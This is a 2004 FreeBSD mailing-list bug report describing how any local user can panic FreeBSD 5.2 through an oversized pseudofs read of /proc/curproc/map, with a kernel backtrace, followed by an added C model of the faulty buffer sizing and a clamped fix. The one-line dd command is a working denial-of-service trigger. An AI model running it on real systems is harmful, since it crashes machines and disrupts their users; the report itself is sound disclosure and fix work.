Date:      Sat, 31 Jan 2004 00:24:58 -0800
From:      Joel Ray Holveck <joelh@piquan.org>
To:        hackers@freebsd.org
Subject:   Panic in /proc
Message-ID:  <87n084cyp1.fsf@thor.piquan.org>

Here's a way to panic FreeBSD 5.2, as any user:

    dd if=/proc/curproc/map iseek=0x8000 bs=4096 of=/dev/null count=1

I briefly examined the core.  It appears that pseudofs is trying to
malloc an sbuf big enough to hold everything up to the 128 MB mark
that we requested, which it intends to get procfs to fill.  Of course,
the malloc fails, and the kernel panics.

I'm normally not inclined to bother tracking down most panics, but
this was interesting because it can be done as any user, not just
root.  That makes it a local unprivileged DoS.

For the interested, here's a backtrace from my 5.2-RELEASE box.  I was
trying to read a slightly different address in this; I think it was
0x8048000.

    panic: kmem_malloc(134516736): kmem_map too small: 37502976 total allocated

    #0  doadump () at ../../../kern/kern_shutdown.c:240
    #1  0xc054a3ba in boot (howto=256) at ../../../kern/kern_shutdown.c:372
    #2  0xc054a6c7 in panic () at ../../../kern/kern_shutdown.c:550
    #3  0xc0673ce0 in kmem_malloc (map=0xc10330a0, size=134516736, flags=2)
        at ../../../vm/vm_kern.c:342
    #4  0xc0683577 in page_alloc (zone=0x0, bytes=0, pflag=0x0, wait=0)
        at ../../../vm/uma_core.c:842
    #5  0xc0684d92 in uma_large_malloc (size=134516736, wait=2)
        at ../../../vm/uma_core.c:2024
    #6  0xc05405bd in malloc (size=134516736, type=0xc076fa00, flags=2)
        at ../../../kern/kern_malloc.c:253
    #7  0xc056bc0b in sbuf_new (s=0xc3764940, buf=0x0, length=0, flags=0)
        at ../../../kern/subr_sbuf.c:187
    #8  0xc05096b6 in pfs_read (va=0x0) at ../../../fs/pseudofs/pseudofs_vnops.c:528
    #9  0xc05a9bd3 in vn_read (fp=0xc39d3d04, uio=0xd3d9dc80, active_cred=0x0, 
        flags=0, td=0xc33713c0) at vnode_if.h:398
    #10 0xc056ea0c in dofileread (td=0xc33713c0, fp=0xc39d3d04, fd=0, 
        buf=0xbfbfcb5c, nbyte=0, offset=0, flags=0) at ../../../sys/file.h:237
    #11 0xc056e86b in read (td=0xc33713c0, uap=0xd3d9dd14)
        at ../../../kern/sys_generic.c:109
    #12 0xc06c76a2 in syscall (frame=
          {tf_fs = 47, tf_es = 47, tf_ds = 47, tf_edi = -1077943348, tf_esi = -1077943336, tf_ebp = -1077943388, tf_isp = -740696716, tf_ebx = 2, tf_edx = 0, tf_ecx = 43, tf_eax = 3, tf_trapno = 12, tf_err = 2, tf_eip = 671900527, tf_cs = 31, tf_eflags = 662, tf_esp = -1077949652, tf_ss = 47})
        at ../../../i386/i386/trap.c:1010
    #13 0xc06b8a5d in Xint0x80_syscall () at {standard input}:136

Cheers,
joelh

-- 
Joel Ray Holveck - joelh@piquan.org
   Fourth law of programming:
   Anything that can go wrong wi
sendmail: segmentation violation - core dumped
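The sizing mistake the message describes, modelled in user space as an added example (this is not code from the message or from the FreeBSD tree): a read path that generates the whole pseudo-file into a buffer sized to `offset + resid`, with the user controlling both through lseek() and the read length, beside a version that clamps the allocation and treats an offset past the generated content as a short read. The function names, the 64 KiB cap `PFS_MAXBUF`, and the two constructed `/proc/curproc/map`-style lines are assumptions chosen for illustration only.

```c
/* Added example: user-space model of the pseudofs read sizing described in
 * the message above.  NOT FreeBSD code; names, the cap and the sample
 * content are assumptions. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Model of a pseudofs "fill" routine: writes the file's whole contents into
 * buf (capacity cap) and returns the full length it would have produced,
 * snprintf-style, so callers can detect truncation.  Constructed content. */
static size_t fill_map(char *buf, size_t cap) {
    const char *lines[] = {
        "0x8048000 0x8049000 1 0 0xc1234567 r-x 1 0 0x0 COW NC vnode\n",
        "0xbfbe0000 0xbfc00000 5 0 0xc1234568 rwx 1 0 0x2180 NCOW NNC default\n",
    };
    size_t total = 0;
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        size_t n = strlen(lines[i]);
        if (total < cap) {
            size_t room = cap - total;
            memcpy(buf + total, lines[i], n < room ? n : room);
        }
        total += n;
    }
    return total;
}

/* Vulnerable sizing: the buffer must hold everything up to the end of the
 * requested window, offset + resid, with no upper bound.  Both values come
 * from the user, so one large lseek() becomes one huge kernel malloc. */
size_t vuln_buflen(uint64_t offset, size_t resid) {
    return (size_t)(offset + resid);
}

/* Hardened sizing: clamp to a fixed cap (assumption: 64 KiB) and reject a
 * window whose arithmetic would wrap.  Returns 0 or an errno value. */
#define PFS_MAXBUF (64 * 1024)
int safe_buflen(uint64_t offset, size_t resid, size_t *out) {
    if ((uint64_t)resid > UINT64_MAX - offset)
        return EINVAL;                      /* offset + resid would wrap */
    uint64_t want = offset + resid;
    *out = want > PFS_MAXBUF ? PFS_MAXBUF : (size_t)want;
    return 0;
}

/* Model of the read: generate into a bounded buffer, then copy out the
 * requested window.  Returns bytes copied or -errno.  An offset at or past
 * the generated (or capped) content is a 0-byte read, never a larger malloc. */
long pfs_read_model(uint64_t offset, char *dst, size_t resid) {
    size_t buflen;
    int err = safe_buflen(offset, resid, &buflen);
    if (err)
        return -err;
    if (buflen == 0)
        return 0;
    char *buf = malloc(buflen);
    if (buf == NULL)
        return -ENOMEM;
    size_t len = fill_map(buf, buflen);
    if (len > buflen)
        len = buflen;                       /* content truncated at the cap */
    long copied = 0;
    if (offset < len) {
        size_t avail = len - (size_t)offset;
        copied = (long)(avail < resid ? avail : resid);
        memcpy(dst, buf + offset, (size_t)copied);
    }
    free(buf);
    return copied;
}

int main(void) {
    char out[4096];
    /* dd iseek=0x8000 bs=4096 count=1: offset 0x8000 * 4096, read 4096 */
    printf("vulnerable buflen: %zu bytes\n",
           vuln_buflen((uint64_t)0x8000 * 4096, 4096));
    printf("hardened read at that offset: %ld bytes\n",
           pfs_read_model((uint64_t)0x8000 * 4096, out, sizeof out));
    printf("hardened read at offset 0: %ld bytes\n",
           pfs_read_model(0, out, sizeof out));
    return 0;
}
```

The clamp trades completeness for safety: content beyond `PFS_MAXBUF` is simply not visible through this path, which is acceptable for small generated files but should be stated wherever such a cap is introduced. The wrap check matters on 32-bit kernels where `uio_offset` is 64-bit and the allocation size is not.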